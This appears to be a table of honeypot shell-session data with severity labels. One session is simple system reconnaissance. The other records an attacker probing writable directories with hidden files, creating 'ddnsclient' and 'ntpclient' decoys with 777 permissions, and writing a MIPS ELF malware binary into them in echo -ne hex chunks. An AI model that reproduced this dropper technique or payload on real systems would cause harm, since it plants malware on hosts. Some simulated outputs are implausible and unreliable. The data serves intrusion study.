session_id stringclasses 160
values | period stringclasses 1
value | turn_index int64 0 351 | command stringlengths 1 1.77k | response stringlengths 12 6.81k | system_change stringlengths 4 2.61k | severity_vi int64 0 4 | response_source stringclasses 1
value |
|---|---|---|---|---|---|---|---|
7affc0047e9f | 2021_2022 | 20 | w | root@ubuntu:~# w
17:12:26 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 15:12 2:00m 0.03s 0.03s -bash
root@ubuntu:~# | No changes to the system were made by this command. | 0 | curated_ubuntu |
7affc0047e9f | 2021_2022 | 21 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system were made by this command. | 0 | curated_ubuntu |
7affc0047e9f | 2021_2022 | 22 | cat /proc/cpuinfo | grep model | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l
32
root@ubuntu:~# | No changes to the system were made by this command. | 0 | curated_ubuntu |
7affc0047e9f | 2021_2022 | 23 | top | root@ubuntu:~# top
top - 17:15:01 up 2:03, 1 user, load average: 0.00, 0.01, 0.05
Tasks: 133 total, 1 running, 132 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 725938364 total, 123456 free, 234567 used, 567890 buff/cache
KiB Swap: 4... | No changes to the system were made by this command. | 0 | curated_ubuntu |
7affc0047e9f | 2021_2022 | 24 | uname | root@ubuntu:~# uname
Linux
root@ubuntu:~# | No changes to the system were made by this command. | 0 | curated_ubuntu |
7affc0047e9f | 2021_2022 | 25 | uname -a | root@ubuntu:~# uname -a
Linux ubuntu 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system were made by this command. | 0 | curated_ubuntu |
7affc0047e9f | 2021_2022 | 26 | lscpu | grep Model | root@ubuntu:~# lscpu | grep Model
Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system were made by this command. | 0 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 0 | >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/tmp# |
- A new file named '.l' was created in the '/tmp' directory.
- The working directory was changed to '/tmp'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 1 | >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var# |
- A new file named '.l' was created in the '/var' directory.
- The working directory was changed to '/var'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 2 | >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev# |
- A new file named '.l' was created in the '/dev' directory.
- The working directory was changed to '/dev'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 3 | >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/mnt# |
- A new file named '.l' was created in the '/mnt' directory.
- The working directory was changed to '/mnt'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 4 | >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/mnt# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var/run# |
- A new file named '.l' was created in the '/var/run' directory.
- The working directory was changed to '/var/run'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 5 | >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var/run# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var/tmp# |
- A new file named '.l' was created in the '/var/tmp' directory.
- The working directory was changed to '/var/tmp'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 6 | >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var/tmp# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/# |
- A new file named '.l' was created in the root directory '/'.
- The working directory was changed to '/'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 7 | >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev/netslink# |
- A new file named '.l' was created in the '/dev/netslink' directory.
- The working directory was changed to '/dev/netslink'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 8 | >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev/netslink# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev/shm# |
- A new file named '.l' was created in the '/dev/shm' directory.
- The working directory was changed to '/dev/shm'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 9 | >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev/shm# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/bin# |
- A new file named '.l' was created in the '/bin' directory.
- The working directory was changed to '/bin'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 10 | >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/bin# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/etc# |
- A new file named '.l' was created in the '/etc' directory.
- The working directory was changed to '/etc'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 11 | >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/etc# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/boot# |
- A new file named '.l' was created in the '/boot' directory.
- The working directory was changed to '/boot'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 12 | >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/boot# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/usr# |
- A new file named '.l' was created in the '/usr' directory.
- The working directory was changed to '/usr'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 13 | >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/usr# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/sys# |
- A new file named '.l' was created in the '/sys' directory.
- The working directory was changed to '/sys'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 14 | rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient | root@ubuntu:/sys# rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient
root@ubuntu:/sys# |
- The files 'ddnsclient' and 'ntpclient' were deleted if they existed in the '/sys' directory.
- The 'echo' command was copied to a new file named 'ddnsclient'.
- The content of 'ddnsclient' was cleared.
- The 'ddnsclient' file was copied to a new file named 'ntpclient'.
- Both 'ddnsclient' and 'ntpclient' were given ... | 4 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 15 | echo -ne '\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x04\x7c\x00\x00\x00\x34\x00\x00\x09\xc0\x00\x00\x10\x07\x00\x34\x00\x20\x00\x03\x00\x28\x00\x06\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x09\x34\x00\x00\x09\x34\x00\x... | root@ubuntu:/sys# echo -ne '\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x04\x7c\x00\x00\x00\x34\x00\x00\x09\xc0\x00\x00\x10\x07\x00\x34\x00\x20\x00\x03\x00\x28\x00\x06\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x09\x34\x00... |
- The content of the 'ddnsclient' file was replaced with a new string.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 16 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\xa2\x00\xff\x30\xe7\x00\xff\x00\x02\x14\x00\x00\x47\x10\x25\x00\x04\x26\x00\x30\xc6\x00\xff\x00\x44\x10\x25\x00\x06\x32\x00\x03\xe0\x00\x08\x00\x46\x10\x25\x3c\x1c\x00\x02\x27\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\xa2\x00\xff\x30\xe7\x00\xff\x00\x02\x14\x00\x00\x47\x10\x25\x00\x04\x26\x00\x30\xc6\x00\xff\x00\x44\x10\x25\x00\x06\x32\x00\x03\xe0\x00\x08\x00\x46\x10\x25\x3c... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 17 | echo -ne '\x3c\x1c\x00\x02\x27\x9c\x88\x30\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x54\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa5\x3c\x1c\x00\x02\x27\x9c\x88\x08\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00\x10\x8f\x99\x80\x54\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\x... | root@ubuntu:/sys# echo -ne '\x3c\x1c\x00\x02\x27\x9c\x88\x30\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x54\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa5\x3c\x1c\x00\x02\x27\x9c\x88\x08\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00\x10\x8f\x99\x80\x54\xaf\xa4\x00\x18\xaf... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 18 | echo -ne '\x00\xa0\x10\x21\x8f\x99\x80\x54\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa4\x3c\x1c\x00\x02\x27\x9c\x87\x94\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x54\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa3\x3c\x1c\x00\x02\x27\x9c\x87\x6c\x03\x... | root@ubuntu:/sys# echo -ne '\x00\xa0\x10\x21\x8f\x99\x80\x54\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa4\x3c\x1c\x00\x02\x27\x9c\x87\x94\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x54\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa3\x3c\x1c\x00\x02\x27... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 19 | echo -ne '\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x02\x27\x9c\x87\x20\x03\x99\xe0\x21\x27\xbd\xff\x30\xaf\xbf\x00\xcc\xaf\xb6\x00\xc8\xaf\xb5\x00\xc4\xaf\xb4\x00\xc0\xaf\xb3\x00\xbc\xaf\xb2\x00\xb8\xaf\xb1\x00\xb4\xaf\xb0\x00\xb0\xaf\xbc\x00\x10\x8f\x82\x80\x18\x00\x00\x80\x21\x10\x... | root@ubuntu:/sys# echo -ne '\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x02\x27\x9c\x87\x20\x03\x99\xe0\x21\x27\xbd\xff\x30\xaf\xbf\x00\xcc\xaf\xb6\x00\xc8\xaf\xb5\x00\xc4\xaf\xb4\x00\xc0\xaf\xb3\x00\xbc\xaf\xb2\x00\xb8\xaf\xb1\x00\xb4\xaf\xb0\x00\xb0\xaf\xbc\x00\x10\x8f\x82\x80\x18\x00... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 20 | echo -ne '\x24\x05\x00\x1f\x24\x06\x00\x62\x03\x20\xf8\x09\xa7\xa2\x00\x1e\x8f\xbc\x00\x10\x24\x05\x03\x01\x8f\x84\x80\x18\x8f\x99\x80\x5c\x24\x84\x09\x08\x24\x06\x01\xff\x03\x20\xf8\x09\xaf\xa2\x00\x20\x8f\xbc\x00\x10\x24\x04\x00\x02\x8f\x99\x80\x48\x24\x05\x00\x02\x00\x00\x30\x21\x03\x20\xf8\x09\x00\x40\xa0\x21\x00\x... | root@ubuntu:/sys# echo -ne '\x24\x05\x00\x1f\x24\x06\x00\x62\x03\x20\xf8\x09\xa7\xa2\x00\x1e\x8f\xbc\x00\x10\x24\x05\x03\x01\x8f\x84\x80\x18\x8f\x99\x80\x5c\x24\x84\x09\x08\x24\x06\x01\xff\x03\x20\xf8\x09\xaf\xa2\x00\x20\x8f\xbc\x00\x10\x24\x04\x00\x02\x8f\x99\x80\x48\x24\x05\x00\x02\x00\x00\x30\x21\x03\x20\xf8\x09\x00... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 21 | echo -ne '\x8f\x99\x80\x3c\x02\x20\x20\x21\x27\xa5\x00\x1c\x03\x20\xf8\x09\x24\x06\x00\x10\x8f\xbc\x00\x10\x04\x41\x00\x07\x00\x00\x00\x00\x8f\x99\x80\x4c\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x02\x20\x23\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x85\x80\x18\x8f\x99\x80\x40\x26\x06\x00\x1a\x24\xa5\x09\x14\x03\x20\xf8\x09\x02\x... | root@ubuntu:/sys# echo -ne '\x8f\x99\x80\x3c\x02\x20\x20\x21\x27\xa5\x00\x1c\x03\x20\xf8\x09\x24\x06\x00\x10\x8f\xbc\x00\x10\x04\x41\x00\x07\x00\x00\x00\x00\x8f\x99\x80\x4c\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x02\x20\x23\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x85\x80\x18\x8f\x99\x80\x40\x26\x06\x00\x1a\x24\xa5\x09\x14\x03... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 22 | echo -ne '\x03\x20\xf8\x09\x24\x06\x00\x01\x24\x03\x00\x01\x8f\xbc\x00\x10\x10\x43\x00\x05\x24\x04\x00\x04\x02\x60\xc8\x21\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x10\x83\xa3\x00\x18\x00\x10\x12\x00\x00\x43\x80\x25\x16\x16\xff\xf0\x02\x20\x20\x21\x8f\x99\x80\x40\x27\xb3\x00\x2c\x03\x20\x90\x21\x8f\x99\x80\x34\x00\x... | root@ubuntu:/sys# echo -ne '\x03\x20\xf8\x09\x24\x06\x00\x01\x24\x03\x00\x01\x8f\xbc\x00\x10\x10\x43\x00\x05\x24\x04\x00\x04\x02\x60\xc8\x21\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x10\x83\xa3\x00\x18\x00\x10\x12\x00\x00\x43\x80\x25\x16\x16\xff\xf0\x02\x20\x20\x21\x8f\x99\x80\x40\x27\xb3\x00\x2c\x03\x20\x90\x21\x8f... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 23 | echo -ne '\x00\x00\x00\x00\x8f\xbc\x00\x10\x10\x00\xff\xf2\x02\x20\x20\x21\x8f\x99\x80\x50\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x20\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x50\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x80\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x4c\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x8f\xbc\x00\x10\x10\x00\xff\xf2\x02\x20\x20\x21\x8f\x99\x80\x50\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x20\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x50\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x80\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x4c\x00\x00\x00\x00\x03... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 24 | echo -ne '\x27\x9c\x84\xb4\x03\x99\xe0\x21\x03\xe0\x00\x21\x04\x11\x00\x01\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x84\x9c\x03\x9f\xe0\x21\x00\x00\xf8\x21\x8f\x99\x80\x38\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x84\x70\x03\x99\xe0\x21\x27\x... | root@ubuntu:/sys# echo -ne '\x27\x9c\x84\xb4\x03\x99\xe0\x21\x03\xe0\x00\x21\x04\x11\x00\x01\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x84\x9c\x03\x9f\xe0\x21\x00\x00\xf8\x21\x8f\x99\x80\x38\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x84\x70\x03\x99... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 25 | echo -ne '\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\xa2\x00\x3c\x8f\xa3\x00\x40\x00\x00\x00\x00\x24\x62\x00\x04\xaf\xa2\x00\x40\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\xa2\x00\x38\x8f\xa3\x00\x40\x00\x00\x00\x00\x24\x62\x00\x04\xaf\xa2\x00\x40\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\x... | root@ubuntu:/sys# echo -ne '\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\xa2\x00\x3c\x8f\xa3\x00\x40\x00\x00\x00\x00\x24\x62\x00\x04\xaf\xa2\x00\x40\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\xa2\x00\x38\x8f\xa3\x00\x40\x00\x00\x00\x00\x24\x62\x00\x04\xaf\xa2\x00\x40\x00\x60\x10\x21\x8c\x42\x00\x00\x00... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 26 | echo -ne '\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\xa2\x00\x2c\x8f\xa3\x00\x40\x00\x00\x00\x00\x24\x62\x00\x04\xaf\xa2\x00\x40\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\xa2\x00\x28\x8f\xa2\x00\x30\x00\x00\x00\x00\xaf\xa2\x00\x10\x8f\xa2\x00\x2c\x00\x00\x00\x00\xaf\xa2\x00\x14\x8f\xa2\x00\x28\x00\x... | root@ubuntu:/sys# echo -ne '\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\xa2\x00\x2c\x8f\xa3\x00\x40\x00\x00\x00\x00\x24\x62\x00\x04\xaf\xa2\x00\x40\x00\x60\x10\x21\x8c\x42\x00\x00\x00\x00\x00\x00\xaf\xa2\x00\x28\x8f\xa2\x00\x30\x00\x00\x00\x00\xaf\xa2\x00\x10\x8f\xa2\x00\x2c\x00\x00\x00\x00\xaf\xa2\x00\x14\x8f... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 27 | echo -ne '\x8f\x99\x80\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x20\x8f\xbf\x00\x48\x27\xbd\x00\x50\x03\xe0\x00\x08\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x83\x0c\x03\x99\xe0\x21\x27\xbd\xff\xc0\xaf\xbf\x00\x38\xaf\xbc\x00\x20\xaf\xa4\x00\x40\xaf\xa5\x00\x44\xaf\xa6\x00\x48\xaf\xa7\x00\x4c\x8f\x... | root@ubuntu:/sys# echo -ne '\x8f\x99\x80\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x20\x8f\xbf\x00\x48\x27\xbd\x00\x50\x03\xe0\x00\x08\x00\x00\x00\x00\x3c\x1c\x00\x02\x27\x9c\x83\x0c\x03\x99\xe0\x21\x27\xbd\xff\xc0\xaf\xbf\x00\x38\xaf\xbc\x00\x20\xaf\xa4\x00\x40\xaf\xa5\x00\x44\xaf\xa6\x00\x48\xaf... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 28 | echo -ne '\x8f\x99\x80\x60\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x20\xaf\xa2\x00\x28\x8f\xa2\x00\x28\x00\x00\x00\x00\x2c\x42\xf0\x01\x14\x40\x00\x06\x00\x00\x00\x00\x8f\xa2\x00\x28\x00\x00\x00\x00\xaf\xa2\x00\x30\x10\x00\x00\x22\x00\x00\x00\x00\x8f\xa3\x00\x40\x24\x02\x10\x75\x10\x62\x00\x09\x00\x... | root@ubuntu:/sys# echo -ne '\x8f\x99\x80\x60\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x20\xaf\xa2\x00\x28\x8f\xa2\x00\x28\x00\x00\x00\x00\x2c\x42\xf0\x01\x14\x40\x00\x06\x00\x00\x00\x00\x8f\xa2\x00\x28\x00\x00\x00\x00\xaf\xa2\x00\x30\x10\x00\x00\x22\x00\x00\x00\x00\x8f\xa3\x00\x40\x24\x02\x10\x75\x10... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 29 | echo -ne '\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x20\x8f\xa3\x00\x40\x24\x02\x10\xc5\x14\x62\x00\x08\x00\x00\x00\x00\x8f\xa4\x00\x4c\x8f\x82\x80\x18\x00\x00\x00\x00\x24\x59\x07\x58\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x20\x8f\xa2\x00\x28\x00\x00\x00\x00\xaf\xa2\x00\x30\x8f\xa2\x00\x30\x8f\xbf\x00\x38\x27\x... | root@ubuntu:/sys# echo -ne '\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x20\x8f\xa3\x00\x40\x24\x02\x10\xc5\x14\x62\x00\x08\x00\x00\x00\x00\x8f\xa4\x00\x4c\x8f\x82\x80\x18\x00\x00\x00\x00\x24\x59\x07\x58\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x20\x8f\xa2\x00\x28\x00\x00\x00\x00\xaf\xa2\x00\x30\x8f\xa2\x00\x30\x8f... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
f1cdcd039d60 | 2021_2022 | 30 | echo -ne '\x00\x04\x18\x02\x00\x00\x10\x21\x8f\xa4\x00\x08\x00\x00\x00\x00\xac\x83\x00\x04\xac\x82\x00\x00\x8f\xa2\x00\x08\x00\x00\x00\x00\x8c\x45\x00\x2c\x8c\x44\x00\x28\x00\x00\x00\x00\x00\x04\x18\x02\x00\x00\x10\x21\x8f\xa4\x00\x08\x00\x00\x00\x00\xac\x83\x00\x2c\xac\x82\x00\x28\x27\xbd\x00\x10\x03\xe0\x00\x08\x00\x... | root@ubuntu:/sys# echo -ne '\x00\x04\x18\x02\x00\x00\x10\x21\x8f\xa4\x00\x08\x00\x00\x00\x00\xac\x83\x00\x04\xac\x82\x00\x00\x8f\xa2\x00\x08\x00\x00\x00\x00\x8c\x45\x00\x2c\x8c\x44\x00\x28\x00\x00\x00\x00\x00\x04\x18\x02\x00\x00\x10\x21\x8f\xa4\x00\x08\x00\x00\x00\x00\xac\x83\x00\x2c\xac\x82\x00\x28\x27\xbd\x00\x10\x03... |
- A new string was appended to the 'ddnsclient' file.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
